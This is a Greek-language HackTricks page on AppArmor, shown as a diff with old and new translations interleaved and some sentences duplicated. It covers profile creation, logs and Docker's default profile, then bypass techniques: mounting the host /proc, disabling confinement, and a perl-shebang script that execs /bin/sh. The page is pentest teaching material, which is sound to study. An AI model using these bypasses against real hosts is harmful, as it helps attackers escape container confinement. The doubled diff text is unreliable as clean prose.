* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
Το AppArmor είναι μια **ενίσχυση του πυρήνα που σχεδιάστηκε για να περιορίσει τους πόρους που είναι διαθέσιμοι σε προγράμματα μέσω προφίλ ανά πρόγραμμα**, εφαρμόζοντας αποτελεσματικά τον Υποχρεωτικό Έλεγχο Πρόσβασης (MAC) δεσμεύοντας τα χαρακτηριστικά ελέγχου πρόσβασης απευθείας στα προγράμματα αντί για τους χρήστες. Αυτό το σύστημα λειτουργεί με το **φόρτωμα προφίλ στον πυρήνα**, συνήθως κατά την εκκίνηση, και αυτά τα προφίλ καθορίζουν ποιους πόρους μπορεί να έχει πρόσβαση ένα πρόγραμμα, όπως συνδέσεις δικτύου, πρόσβαση σε ωμά sockets και άδειες αρχείων.
|
||||
Το AppArmor είναι μια **ενίσχυση πυρήνα σχεδιασμένη για να περιορίζει τους πόρους που είναι διαθέσιμοι σε προγράμματα μέσω προφίλ ανά πρόγραμμα**, εφαρμόζοντας αποτελεσματικά τον Εξαναγκαστικό Έλεγχο Πρόσβασης (MAC) δεσμεύοντας τα χαρακτηριστικά ελέγχου πρόσβασης απευθείας στα προγράμματα αντί για τους χρήστες. Αυτό το σύστημα λειτουργεί με τον **φόρτωση προφίλ στον πυρήνα**, συνήθως κατά την εκκίνηση, και αυτά τα προφίλ καθορίζουν ποιους πόρους μπορεί να έχει πρόσβαση ένα πρόγραμμα, όπως συνδέσεις δικτύου, πρόσβαση σε ωμές συνδέσεις και άδειες αρχείων.
|
||||
|
||||
Υπάρχουν δύο λειτουργικά modes για τα προφίλ AppArmor:
|
||||
Υπάρχουν δύο λειτουργικές καταστάσεις για τα προφίλ AppArmor:
|
||||
|
||||
- **Λειτουργία Επιβολής**: Αυτή η λειτουργία επιβάλλει ενεργά τις πολιτικές που έχουν καθοριστεί στο προφίλ, αποκλείοντας ενέργειες που παραβιάζουν αυτές τις πολιτικές και καταγράφοντας οποιαδήποτε προσπάθεια παραβίασής τους μέσω συστημάτων όπως το syslog ή το auditd.
|
||||
- **Λειτουργία Διαμαρτυρίας**: Αντίθετα από τη λειτουργία επιβολής, η λειτουργία διαμαρτυρίας δεν αποκλείει ενέργειες που παραβιάζουν τις πολιτικές του προφίλ. Αντ' αυτού, καταγράφει αυτές τις προσπάθειες ως παραβιάσεις πολιτικής χωρίς να επιβάλλει περιορισμούς.
|
||||
- **Λειτουργία Επιβολής**: Αυτή η λειτουργία επιβάλλει ενεργά τις πολιτικές που έχουν οριστεί στο προφίλ, αποκλείοντας ενέργειες που παραβιάζουν αυτές τις πολιτικές και καταγράφοντας οποιεσδήποτε προσπάθειες παραβίασής τους μέσω συστημάτων όπως το syslog ή το auditd.
|
||||
- **Λειτουργία Διαμαρτυρίας**: Σε αντίθεση με τη λειτουργία επιβολής, η λειτουργία διαμαρτυρίας δεν αποκλείει ενέργειες που παραβιάζουν τις πολιτικές του προφίλ. Αντ' αυτού, καταγράφει αυτές τις προσπάθειες ως παραβιάσεις πολιτικής χωρίς να επιβάλλει περιορισμούς.
|
||||
|
||||
### Συστατικά του AppArmor
|
||||
### Στοιχεία του AppArmor
|
||||
|
||||
- **Πυρήνας Ενότητας**: Υπεύθυνος για την επιβολή των πολιτικών.
|
||||
- **Πολιτικές**: Καθορίζουν τους κανόνες και τους περιορισμούς για τη συμπεριφορά των προγραμμάτων και την πρόσβαση σε πόρους.
|
||||
- **Πολιτικές**: Καθορίζουν τους κανόνες και τους περιορισμούς για τη συμπεριφορά του προγράμματος και την πρόσβαση σε πόρους.
|
||||
- **Αναλυτής**: Φορτώνει τις πολιτικές στον πυρήνα για επιβολή ή αναφορά.
|
||||
- **Προγράμματα Χρηστών**: Αυτά είναι προγράμματα λειτουργίας χρήστη που παρέχουν μια διεπαφή για την αλληλεπίδραση και τη διαχείριση του AppArmor.
|
||||
|
||||
### Διαδρομή προφίλ
|
||||
### Διαδρομές Προφίλ
|
||||
|
||||
Τα προφίλ AppArmor συνήθως αποθηκεύονται στο _**/etc/apparmor.d/**_\
|
||||
Με την εντολή `sudo aa-status` θα μπορείτε να καταλογίσετε τα δυαδικά που περιορίζονται από κάποιο προφίλ. Εάν μπορείτε να αλλάξετε τον χαρακτήρα "/" με ένα τελεία από τη διαδρομή του κάθε καταχωρημένου δυαδικού, θα λάβετε το όνομα του προφίλ apparmor μέσα στον αναφερόμενο φάκελο.
|
||||
Τα προφίλ Apparmor συνήθως αποθηκεύονται στο _**/etc/apparmor.d/**_\
|
||||
Με την εντολή `sudo aa-status` θα μπορείτε να καταλάβετε τα δυαδικά που περιορίζονται από κάποιο προφίλ. Αν μπορείτε να αλλάξετε το χαρακτήρα "/" με ένα τελεία από τη διαδρομή κάθε καταχωρημένου δυαδικού, θα λάβετε το όνομα του προφίλ apparmor μέσα στο αναφερόμενο φάκελο.
|
||||
|
||||
Για παράδειγμα, ένα **προφίλ apparmor** για το _/usr/bin/man_ θα βρίσκεται στο _/etc/apparmor.d/usr.bin.man_
|
||||
Για παράδειγμα, ένα προφίλ **apparmor** για το _/usr/bin/man_ θα βρίσκεται στο _/etc/apparmor.d/usr.bin.man_
|
||||
|
||||
### Εντολές
|
||||
```bash
|
||||
|
@ -49,40 +63,40 @@ aa-mergeprof #used to merge the policies
|
|||
```
|
||||
## Δημιουργία ενός προφίλ
|
||||
|
||||
* Για να υποδείξετε το επηρεαζόμενο εκτελέσιμο, επιτρέπονται **απόλυτοι διαδρομές και μπαλαντέρ** (για την αναζήτηση αρχείων) για την καθορισμό των αρχείων.
|
||||
* Για να υποδείξετε την πρόσβαση που θα έχει το δυαδικό αρχείο σε **αρχεία**, μπορούν να χρησιμοποιηθούν οι ακόλουθοι **έλεγχοι πρόσβασης**:
|
||||
* **r** (ανάγνωση)
|
||||
* **w** (εγγραφή)
|
||||
* **m** (χαρτογράφηση μνήμης ως εκτελέσιμο)
|
||||
* **k** (κλείδωμα αρχείου)
|
||||
* **l** (δημιουργία σκληρών συνδέσμων)
|
||||
* **ix** (εκτέλεση ενός άλλου προγράμματος με το νέο πρόγραμμα να κληρονομεί την πολιτική)
|
||||
* **Px** (εκτέλεση υπό άλλο προφίλ, μετά τον καθαρισμό του περιβάλλοντος)
|
||||
* **Cx** (εκτέλεση υπό προφίλ παιδιού, μετά τον καθαρισμό του περιβάλλοντος)
|
||||
* **Ux** (εκτέλεση χωρίς περιορισμούς, μετά τον καθαρισμό του περιβάλλοντος)
|
||||
* Μπορούν να οριστούν **μεταβλητές** στα προφίλ και μπορούν να τροποποιηθούν από έξω από το προφίλ. Για παράδειγμα: @{PROC} και @{HOME} (προσθέστε #include \<tunables/global> στο αρχείο προφίλ)
|
||||
* Οι **κανόνες απόρριψης υποστηρίζονται για να αντικαταστήσουν τους κανόνες αποδοχής**.
|
||||
* Για να υποδείξετε το επηρεαζόμενο εκτελέσιμο, επιτρέπονται **απόλυτα μονοπάτια και μπαλαντέρ** (για αντιστοίχιση αρχείων) για την καθορισμό αρχείων.
|
||||
* Για να υποδείξετε την πρόσβαση που το δυαδικό θα έχει σε **αρχεία** μπορούν να χρησιμοποιηθούν οι ακόλουθοι **έλεγχοι πρόσβασης**:
|
||||
* **r** (ανάγνωση)
|
||||
* **w** (εγγραφή)
|
||||
* **m** (χαρτογράφηση μνήμης ως εκτελέσιμο)
|
||||
* **k** (κλείδωμα αρχείου)
|
||||
* **l** (δημιουργία σκληρών συνδέσμων)
|
||||
* **ix** (για να εκτελέσετε ένα άλλο πρόγραμμα με το νέο πρόγραμμα να κληρονομεί την πολιτική)
|
||||
* **Px** (εκτέλεση υπό άλλο προφίλ, μετά τον καθαρισμό του περιβάλλοντος)
|
||||
* **Cx** (εκτέλεση υπό προφίλ παιδιού, μετά τον καθαρισμό του περιβάλλοντος)
|
||||
* **Ux** (εκτέλεση χωρίς περιορισμούς, μετά τον καθαρισμό του περιβάλλοντος)
|
||||
* **Μεταβλητές** μπορούν να οριστούν στα προφίλ και μπορούν να ρυθμιστούν από έξω από το προφίλ. Για παράδειγμα: @{PROC} και @{HOME} (προσθέστε #include \<tunables/global> στο αρχείο προφίλ)
|
||||
* **Οι κανόνες απαγόρευσης υποστηρίζονται για να αντικαταστήσουν τους κανόνες επιτροπής**.
|
||||
|
||||
### aa-genprof
|
||||
|
||||
Για να ξεκινήσετε εύκολα τη δημιουργία ενός προφίλ, μπορείτε να χρησιμοποιήσετε το apparmor. Είναι δυνατόν να κάνετε το **apparmor να επιθεωρήσει τις ενέργειες που πραγματοποιούνται από ένα δυαδικό αρχείο και στη συνέχεια να σας επιτρέψει να αποφασίσετε ποιες ενέργειες θέλετε να επιτρέψετε ή να απορρίψετε**.\
|
||||
Απλά χρειάζεται να εκτελέσετε:
|
||||
Για να ξεκινήσετε εύκολα τη δημιουργία ενός προφίλ, μπορείτε να χρησιμοποιήσετε το apparmor. Είναι δυνατόν να κάνετε **το apparmor να ελέγξει τις ενέργειες που εκτελεί ένα δυαδικό και στη συνέχεια να σας επιτρέψει να αποφασίσετε ποιες ενέργειες θέλετε να επιτρέψετε ή να απαγορεύσετε**.\
|
||||
Απλώς χρειάζεται να εκτελέσετε:
|
||||
```bash
|
||||
sudo aa-genprof /path/to/binary
|
||||
```
|
||||
Στη συνέχεια, σε ένα διαφορετικό τερματικό, εκτελέστε όλες τις ενέργειες που συνήθως θα εκτελούνταν από το δυαδικό αρχείο:
|
||||
Στη συνέχεια, σε ένα διαφορετικό τερματικό, εκτελέστε όλες τις ενέργειες που συνήθως θα εκτελούσε το δυαδικό αρχείο:
|
||||
```bash
|
||||
/path/to/binary -a dosomething
|
||||
```
|
||||
Στη συνέχεια, στην πρώτη κονσόλα πατήστε "**s**" και στη συνέχεια στις καταγεγραμμένες ενέργειες υποδείξτε εάν θέλετε να αγνοήσετε, επιτρέψετε ή οτιδήποτε άλλο. Όταν τελειώσετε, πατήστε "**f**" και το νέο προφίλ θα δημιουργηθεί στο _/etc/apparmor.d/path.to.binary_
|
||||
Στη συνέχεια, στην πρώτη κονσόλα πατήστε "**s**" και στις καταγεγραμμένες ενέργειες υποδείξτε εάν θέλετε να αγνοήσετε, επιτρέψετε, ή οτιδήποτε άλλο. Όταν τελειώσετε, πατήστε "**f**" και το νέο προφίλ θα δημιουργηθεί στο _/etc/apparmor.d/path.to.binary_
|
||||
|
||||
{% hint style="info" %}
|
||||
Χρησιμοποιώντας τα πλήκτρα με τα βέλη μπορείτε να επιλέξετε τι θέλετε να επιτρέψετε/απαγορεύσετε/οτιδήποτε άλλο
|
||||
Χρησιμοποιώντας τα πλήκτρα βέλους μπορείτε να επιλέξετε τι θέλετε να επιτρέψετε/απαγορεύσετε/οτιδήποτε άλλο
|
||||
{% endhint %}
|
||||
|
||||
### aa-easyprof
|
||||
|
||||
Μπορείτε επίσης να δημιουργήσετε ένα πρότυπο ενός προφίλ apparmor για ένα δυαδικό αρχείο με:
|
||||
Μπορείτε επίσης να δημιουργήσετε ένα πρότυπο ενός προφίλ apparmor ενός δυαδικού με:
|
||||
```bash
|
||||
sudo aa-easyprof /path/to/binary
|
||||
# vim:syntax=apparmor
|
||||
|
@ -108,24 +122,24 @@ sudo aa-easyprof /path/to/binary
|
|||
}
|
||||
```
|
||||
{% hint style="info" %}
|
||||
Σημείωση ότι από προεπιλογή σε ένα δημιουργημένο προφίλ τίποτα δεν επιτρέπεται, οπότε όλα απορρίπτονται. Θα πρέπει να προσθέσετε γραμμές όπως `/etc/passwd r,` για να επιτρέψετε την ανάγνωση του δυαδικού `/etc/passwd` για παράδειγμα.
|
||||
Σημειώστε ότι από προεπιλογή σε ένα δημιουργημένο προφίλ τίποτα δεν επιτρέπεται, οπότε όλα απορρίπτονται. Θα πρέπει να προσθέσετε γραμμές όπως `/etc/passwd r,` για να επιτρέψετε στο δυαδικό να διαβάσει το `/etc/passwd` για παράδειγμα.
|
||||
{% endhint %}
|
||||
|
||||
Στη συνέχεια μπορείτε να **επιβάλετε** το νέο προφίλ με την εντολή
|
||||
Στη συνέχεια μπορείτε να **επιβάλετε** το νέο προφίλ με
|
||||
```bash
|
||||
sudo apparmor_parser -a /etc/apparmor.d/path.to.binary
|
||||
```
|
||||
### Τροποποίηση ενός προφίλ από τα αρχεία καταγραφής
|
||||
### Τροποποίηση ενός προφίλ από τα logs
|
||||
|
||||
Το παρακάτω εργαλείο θα διαβάσει τα αρχεία καταγραφής και θα ζητήσει από τον χρήστη εάν επιθυμεί να επιτρέψει ορισμένες από τις ανιχνευμένες απαγορευμένες ενέργειες:
|
||||
Το παρακάτω εργαλείο θα διαβάσει τα logs και θα ρωτήσει τον χρήστη εάν επιθυμεί να επιτρέψει κάποιες από τις ανιχνευμένες απαγορευμένες ενέργειες:
|
||||
```bash
|
||||
sudo aa-logprof
|
||||
```
|
||||
{% hint style="info" %}
|
||||
Χρησιμοποιώντας τα βέλη μπορείτε να επιλέξετε το τι θέλετε να επιτρέψετε/απαγορεύσετε/οτιδήποτε
|
||||
Χρησιμοποιώντας τα πλήκτρα βέλους μπορείτε να επιλέξετε τι θέλετε να επιτρέώσετε/απαγορεύσετε/ό,τιδήποτε
|
||||
{% endhint %}
|
||||
|
||||
### Διαχείριση ενός προφίλ
|
||||
### Διαχείριση ενός Προφίλ
|
||||
```bash
|
||||
#Main profile management commands
|
||||
apparmor_parser -a /etc/apparmor.d/profile.name #Load a new profile in enforce mode
|
||||
|
@ -135,12 +149,12 @@ apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile
|
|||
```
|
||||
## Αρχεία καταγραφής
|
||||
|
||||
Παράδειγμα των αρχείων καταγραφής **AUDIT** και **DENIED** από το _/var/log/audit/audit.log_ του εκτελέσιμου **`service_bin`**:
|
||||
Παράδειγμα **ΑΥΤΙΣΜΟΥ** και **ΑΠΟΡΡΙΨΗΣ** καταγραφών από το _/var/log/audit/audit.log_ του εκτελέσιμου **`service_bin`**:
|
||||
```bash
|
||||
type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000
|
||||
type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
|
||||
```
|
||||
Μπορείτε επίσης να αποκτήσετε αυτές τις πληροφορίες χρησιμοποιώντας:
|
||||
Μπορείτε επίσης να λάβετε αυτές τις πληροφορίες χρησιμοποιώντας:
|
||||
```bash
|
||||
sudo aa-notify -s 1 -v
|
||||
Profile: /bin/service_bin
|
||||
|
@ -160,7 +174,7 @@ For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor
|
|||
```
|
||||
## Apparmor στο Docker
|
||||
|
||||
Παρατηρήστε πώς το προφίλ **docker-profile** του docker φορτώνεται από προεπιλογή:
|
||||
Σημειώστε πως το προφίλ **docker-profile** του docker φορτώνεται από προεπιλογή:
|
||||
```bash
|
||||
sudo aa-status
|
||||
apparmor module is loaded.
|
||||
|
@ -176,23 +190,23 @@ apparmor module is loaded.
|
|||
/usr/lib/connman/scripts/dhclient-script
|
||||
docker-default
|
||||
```
|
||||
Από προεπιλογή, το προφίλ **Apparmor docker-default** δημιουργείται από το [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor)
|
||||
Από προεπιλογή το προφίλ **Apparmor docker-default** δημιουργείται από [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor)
|
||||
|
||||
**Περίληψη προφίλ docker-default**:
|
||||
|
||||
* **Πρόσβαση** σε όλο το **δίκτυο**
|
||||
* Δεν έχει οριστεί **δυνατότητα** (Ωστόσο, ορισμένες δυνατότητες θα προέλθουν από την συμπερίληψη βασικών κανόνων βάσης, δηλαδή #include \<abstractions/base>)
|
||||
* **Δεν επιτρέπεται** η **εγγραφή** σε οποιοδήποτε αρχείο **/proc**
|
||||
* Άλλοι **υποκατάλογοι**/**αρχεία** του /**proc** και /**sys** **απαγορεύεται** η πρόσβαση για ανάγνωση/εγγραφή/κλείδωμα/σύνδεση/εκτέλεση
|
||||
* **Δεν επιτρέπεται** η **προσάρτηση** (mount)
|
||||
* Το **Ptrace** μπορεί να εκτελεστεί μόνο σε ένα διεργασία που περιορίζεται από το **ίδιο προφίλ apparmor**
|
||||
* Δεν έχει οριστεί **κάποια ικανότητα** (Ωστόσο, μερικές ικανότητες θα προέλθουν από τη συμπερίληψη βασικών κανόνων βάσης, δηλαδή #include \<abstractions/base>)
|
||||
* **Εγγραφή** σε οποιοδήποτε αρχείο **/proc** δεν επιτρέπεται
|
||||
* Άλλοι **υποκατάλογοι**/**αρχεία** του /**proc** και /**sys** απαγορεύεται η πρόσβαση για ανάγνωση/εγγραφή/κλείδωμα/σύνδεση/εκτέλεση
|
||||
* **Μοντάρισμα** δεν επιτρέπεται
|
||||
* Η **Ptrace** μπορεί να εκτελεστεί μόνο σε ένα διεργασία που περιορίζεται από το **ίδιο προφίλ apparmor**
|
||||
|
||||
Μόλις **εκτελέσετε ένα container docker**, θα πρέπει να δείτε την ακόλουθη έξοδο:
|
||||
```bash
|
||||
1 processes are in enforce mode.
|
||||
docker-default (825)
|
||||
```
|
||||
Σημείωση ότι το **apparmor θα αποκλείσει ακόμα και τα προνόμια των δυνατοτήτων** που έχουν χορηγηθεί στον εκτελούμενο χώρο από προεπιλογή. Για παράδειγμα, θα μπορεί να **αποκλείσει την άδεια εγγραφής μέσα στο /proc ακόμα κι αν έχει χορηγηθεί η δυνατότητα SYS\_ADMIN** επειδή από προεπιλογή το προφίλ apparmor του docker απορρίπτει αυτήν την πρόσβαση:
|
||||
Σημειώστε ότι **το apparmor θα αποκλείσει ακόμα και τα προνόμια δικαιωμάτων** που έχουν χορηγηθεί στον εκτελέσιμο προεπιλεγμένα. Για παράδειγμα, θα μπορεί **να αποκλείσει την άδεια εγγραφής μέσα στον φάκελο /proc ακόμα κι αν έχει χορηγηθεί η δυνατότητα SYS\_ADMIN** επειδή από προεπιλογή το προφίλ apparmor του docker απορρίπτει αυτήν την πρόσβαση:
|
||||
```bash
|
||||
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash
|
||||
echo "" > /proc/stat
|
||||
|
@ -202,61 +216,59 @@ sh: 1: cannot create /proc/stat: Permission denied
|
|||
```bash
|
||||
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash
|
||||
```
|
||||
Σημείωση ότι από προεπιλογή το **AppArmor** θα απαγορεύει επίσης στον container να κάνει mount φακέλους από μέσα, ακόμα και με την δυνατότητα SYS\_ADMIN.
|
||||
Σημειώστε ότι από προεπιλογή το **AppArmor** θα απαγορεύσει στο container να κάνει mount φακέλους από μέσα ακόμα και με τη δυνατότητα SYS\_ADMIN.
|
||||
|
||||
Σημειώστε ότι μπορείτε να **προσθέσετε/αφαιρέσετε** **δυνατότητες** στον docker container (αυτό θα περιοριστεί από μεθόδους προστασίας όπως το **AppArmor** και το **Seccomp**):
|
||||
Σημειώστε ότι μπορείτε να **προσθέσετε/αφαιρέσετε** **δυνατότητες** στο docker container (αυτό θα παραμείνει περιορισμένο από μεθόδους προστασίας όπως το **AppArmor** και το **Seccomp**):
|
||||
|
||||
* `--cap-add=SYS_ADMIN` δίνει τη δυνατότητα `SYS_ADMIN`
|
||||
* `--cap-add=ALL` δίνει όλες τις δυνατότητες
|
||||
* `--cap-drop=ALL --cap-add=SYS_PTRACE` απορρίπτει όλες τις δυνατότητες και δίνει μόνο τη `SYS_PTRACE`
|
||||
* `--cap-add=SYS_ADMIN` προσθέτει τη δυνατότητα `SYS_ADMIN`
|
||||
* `--cap-add=ALL` προσθέτει όλες τις δυνατότητες
|
||||
* `--cap-drop=ALL --cap-add=SYS_PTRACE` αφαιρεί όλες τις δυνατότητες και δίνει μόνο την `SYS_PTRACE`
|
||||
|
||||
{% hint style="info" %}
|
||||
Συνήθως, όταν **ανακαλύπτετε** ότι έχετε μια **δυνατότητα με προνόμια** διαθέσιμη **μέσα** σε ένα **docker** container **αλλά** κάποιο μέρος της **εκμετάλλευσης δεν λειτουργεί**, αυτό οφείλεται στο ότι το docker **apparmor το αποτρέπει**.
|
||||
Συνήθως, όταν **ανακαλύπτετε** ότι έχετε μια **προνομιούχα δυνατότητα** διαθέσιμη **μέσα** σε ένα **docker** container **αλλά** κάποιο τμήμα του **exploit δεν λειτουργεί**, αυτό οφείλεται στο ότι το docker **apparmor το εμποδίζει**.
|
||||
{% endhint %}
|
||||
|
||||
### Παράδειγμα
|
||||
|
||||
(Παράδειγμα από [**εδώ**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/))
|
||||
|
||||
Για να επιδείξει τη λειτουργικότητα του AppArmor, δημιούργησα ένα νέο προφίλ Docker με το όνομα "mydocker" και πρόσθεσα την παρακάτω γραμμή:
|
||||
Για να εικονίσουμε τη λειτουργικότητα του AppArmor, δημιούργησα ένα νέο προφίλ Docker "mydocker" με την παρακάτω γραμμή προστεθεισμένη:
|
||||
```
|
||||
deny /etc/* w, # deny write for all files directly in /etc (not in a subdir)
|
||||
```
|
||||
Για να ενεργοποιήσουμε το προφίλ, πρέπει να ακολουθήσουμε τα παρακάτω βήματα:
|
||||
Για να ενεργοποιήσουμε το προφίλ, πρέπει να κάνουμε τα ακόλουθα:
|
||||
```
|
||||
sudo apparmor_parser -r -W mydocker
|
||||
```
|
||||
Για να εμφανίσουμε τα προφίλ, μπορούμε να εκτελέσουμε την παρακάτω εντολή. Η παρακάτω εντολή εμφανίζει το νέο προφίλ AppArmor μου.
|
||||
Για να εμφανίσουμε τα προφίλ, μπορούμε να χρησιμοποιήσουμε την παρακάτω εντολή. Η παρακάτω εντολή εμφανίζει το νέο προφίλ AppArmor μου.
|
||||
```
|
||||
$ sudo apparmor_status | grep mydocker
|
||||
mydocker
|
||||
```
|
||||
Όπως φαίνεται παρακάτω, λαμβάνουμε σφάλμα όταν προσπαθούμε να αλλάξουμε το "/etc/" επειδή το προφίλ του AppArmor αποτρέπει την εγγραφή στο "/etc".
|
||||
Όπως φαίνεται παρακάτω, λαμβάνουμε σφάλμα όταν προσπαθούμε να αλλάξουμε το "/etc/" επειδή το προφίλ του AppArmor εμποδίζει την εγγραφή πρόσβασης στο "/etc".
|
||||
```
|
||||
$ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname
|
||||
chmod: /etc/hostname: Permission denied
|
||||
```
|
||||
### Παράκαμψη AppArmor Docker1
|
||||
|
||||
Μπορείτε να βρείτε ποιο **προφίλ apparmor εκτελεί ένας container** χρησιμοποιώντας:
|
||||
Μπορείτε να βρείτε ποιο προφίλ **apparmor εκτελείται από ένα container** χρησιμοποιώντας:
|
||||
```bash
|
||||
docker inspect 9d622d73a614 | grep lowpriv
|
||||
"AppArmorProfile": "lowpriv",
|
||||
"apparmor=lowpriv"
|
||||
```
|
||||
Στη συνέχεια, μπορείτε να εκτελέσετε την παρακάτω γραμμή για να **βρείτε το ακριβές προφίλ που χρησιμοποιείται**:
|
||||
Στη συνέχεια, μπορείτε να εκτελέσετε την παρακάτω γραμμή για **να βρείτε το ακριβές προφίλ που χρησιμοποιείται**:
|
||||
```bash
|
||||
find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
|
||||
```
|
||||
Στην περίεργη περίπτωση που μπορείτε να τροποποιήσετε το προφίλ του apparmor για το docker και να το επαναφορτώσετε. Μπορείτε να αφαιρέσετε τους περιορισμούς και να τους "παρακάμψετε".
|
||||
### Παράκαμψη AppArmor Docker2
|
||||
|
||||
### Παράκαμψη AppArmor Docker 2
|
||||
**Το AppArmor βασίζεται στα μονοπάτια**, αυτό σημαίνει ότι ακόμα και αν **προστατεύει** αρχεία μέσα σε έναν κατάλογο όπως το **`/proc`**, αν μπορείτε **να ρυθμίσετε πώς θα εκτελείται το container**, μπορείτε **να προσαρτήσετε** τον κατάλογο proc του κεντρικού συστήματος μέσα στο **`/host/proc`** και δεν θα προστατεύεται πλέον από το AppArmor.
|
||||
|
||||
Το AppArmor βασίζεται σε διαδρομή, αυτό σημαίνει ότι ακόμα κι αν προστατεύει αρχεία μέσα σε έναν κατάλογο όπως το `/proc`, αν μπορείτε να ρυθμίσετε πώς θα εκτελεστεί ο container, μπορείτε να προσαρτήσετε τον κατάλογο proc του κεντρικού συστήματος μέσα στο `/host/proc` και δεν θα προστατεύεται πλέον από το AppArmor.
|
||||
### Παράκαμψη Shebang του AppArmor
|
||||
|
||||
### Παράκαμψη AppArmor Shebang
|
||||
|
||||
Σε αυτό το [σφάλμα](https://bugs.launchpad.net/apparmor/+bug/1911431) μπορείτε να δείτε ένα παράδειγμα πώς ακόμα κι αν αποτρέπετε την εκτέλεση του perl με συγκεκριμένους πόρους, αν απλά δημιουργήσετε ένα shell script καθορίζοντας στην πρώτη γραμμή `#!/usr/bin/perl` και εκτελέσετε το αρχείο απευθείας, θα μπορείτε να εκτελέσετε οτιδήποτε θέλετε. Π.χ.:
|
||||
Σε [**αυτό το σφάλμα**](https://bugs.launchpad.net/apparmor/+bug/1911431) μπορείτε να δείτε ένα παράδειγμα πώς **ακόμα κι αν αποτρέπετε την εκτέλεση του perl με συγκεκριμένους πόρους**, αν απλά δημιουργήσετε ένα shell script **προσδιορίζοντας** στην πρώτη γραμμή **`#!/usr/bin/perl`** και **εκτελέσετε το αρχείο απευθείας**, θα μπορείτε να εκτελέσετε ό,τι θέλετε. Π.χ.:
|
||||
```perl
|
||||
echo '#!/usr/bin/perl
|
||||
use POSIX qw(strftime);
|
||||
|
@ -266,16 +278,28 @@ exec "/bin/sh"' > /tmp/test.pl
|
|||
chmod +x /tmp/test.pl
|
||||
/tmp/test.pl
|
||||
```
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
